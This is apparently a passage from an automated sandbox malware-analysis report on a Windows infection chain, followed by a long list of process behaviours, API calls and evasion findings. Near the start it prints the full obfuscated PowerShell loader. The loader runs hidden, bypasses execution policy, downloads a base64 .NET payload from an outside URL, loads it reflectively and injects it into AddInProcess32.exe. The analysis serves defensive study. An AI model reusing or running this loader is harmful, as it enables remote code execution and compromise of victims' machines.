J29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041CB50
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347715F0 pushad ; ret 4_2_00007FFD3477160D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347735FA push eax; ret 4_2_00007FFD34773601
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00457106 push ecx; ret 7_2_00457119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0045B11A push esp; ret 7_2_0045B141
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0045E54D push esi; ret 7_2_0045E556
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00457A28 push eax; ret 7_2_00457A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00434E56 push ecx; ret 7_2_00434E69
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00406EB0 ShellExecuteW,URLDownloadToFileW,7_2_00406EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0041AA4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041CB50
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Delayed program exit found
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040F7A7 Sleep,ExitProcess,7_2_0040F7A7
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3477A4C9 sldt word ptr fs:[eax]4_2_00007FFD3477A4C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_0041A748
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1699Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1655Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3860Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5981Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 5622Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3785Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1751Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep count: 3860 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976Thread sleep count: 5981 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1048Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6504Thread sleep count: 201 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6504Thread sleep time: -100500s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2276Thread sleep count: 5622 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2276Thread sleep time: -16866000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2276Thread sleep count: 3785 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2276Thread sleep time: -11355000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0044E879 FindFirstFileExA,7_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040783C FindFirstFileW,FindNextFileW,7_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00419AF5
